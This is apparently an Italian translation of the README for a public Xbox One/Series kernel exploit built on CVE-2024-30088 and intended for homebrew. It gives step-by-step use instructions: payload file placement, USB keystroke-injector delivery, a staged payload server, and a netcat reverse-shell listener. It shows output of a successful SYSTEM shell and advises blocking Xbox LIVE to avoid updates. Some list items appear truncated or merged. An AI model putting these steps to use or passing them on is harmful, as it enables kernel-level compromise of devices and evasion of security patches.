
Exploit del kernel per Xbox SystemOS tramite CVE-2024-30088
Danni Collaterali è un exploit per il kernel di Xbox SystemOS che sfrutta CVE-2024-30088. Prende di mira console Xbox One e Xbox Series con versioni del kernel 25398.4478, 25398.4908 e 25398.4909. Il punto di ingresso iniziale è tramite l'applicazione UWP Game Script.
I payload del primo stadio, il caricatore PE e il caricatore di rete sono forniti da Solstice.
Questo exploit è stato sviluppato da Emma Kirkpatrick (scoperta della vulnerabilità e sfruttamento) e Lander Brandt (Solstice)
Per posizionare il payload localmente sulla console Xbox, si consiglia un esploratore con trust completo come Adv File Explorer (FullTrust). In alternativa, il payload iniziale può essere servito tramite un simulatore di tastiera USB (rubber ducky, ecc.) e gli stadi successivi del payload possono poi essere caricati in rete.
L'esempio di shell inversa fornito qui richiede che la console sia connessa a una rete. Quando colleghi la console a una rete, fai molta attenzione a evitare di connetterti a Internet e di eseguire aggiornamenti. Cerca di bloccare la connettività a Xbox LIVE il più possibile, almeno impostando i server DNS su indirizzi non validi.
Questo exploit non è completamente affidabile. Si basa su un canale laterale della CPU e su una race condition, entrambi potenzialmente fallibili. In caso di fallimento, l'exploit potrebbe avvisarti del fallimento tramite output di rete, oppure la console stessa potrebbe bloccarsi e riavviarsi.
gamescript_autosave_network.txt o gamescript_autosave.txt per contenere l'IP locale del tuo PC.
gamescript_autosave.txt, stage2.bin e run.exe nella directory LocalState dell'applicazione Game Script sulla tua console (Q:\Users\UserMgr0\AppData\Local\Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState\)gamescript_autosave_network.txt nella finestra GameScript. Servi stage2.bin e run.exe tramite payload_server_win_x64.exe --stage2 stage2.bin --run run.exelistening on [any] 7070 ...
connect to [192.168.0.61] from (UNKNOWN) [192.168.0.130] 49665
Danni Collaterali - @carrot_c4k3 & @landaire (exploits.forsale)
Numero build: 25398.4478
Tentativo di trovare la base del kernel...
Trovata probabile base del kernel: FFFFF80AF9800000
Tentativo di exploit...
Exploit riuscito! Esecuzione del payload!
Microsoft Windows [Versione 10.0.25398.4478]
Copyright (c) Microsoft Corporation. Tutti i diritti riservati.
S:\>
C'è ancora molto lavoro da fare per portare questo punto a uno strumento user-friendly per caricare homebrew sulla Xbox, ma spero che questo fornisca un buon punto di partenza :) Se vuoi giocare con l'esecuzione di codice come SYSTEM, puoi inserire il tuo codice nella funzione post_exploit in post_exploit.c.
C'è ancora molto da fare su questo, ma dato che la parte del kernel è completata, ho voluto condividerla con la comunità in modo che gli sviluppatori possano iniziare a esplorare con privilegi SYSTEM. Ecco alcune cose che spero ancora di aggiungere in futuro:
Ulteriori idee sono benvenute :)
grazie a tutti coloro che mi hanno aiutato a fare brainstorming e hanno condiviso con me la loro conoscenza e il loro tempo durante questo percorso!!! alcune delle persone a cui vorrei mostrare apprezzamento:
nc64.exe -lvnp 7070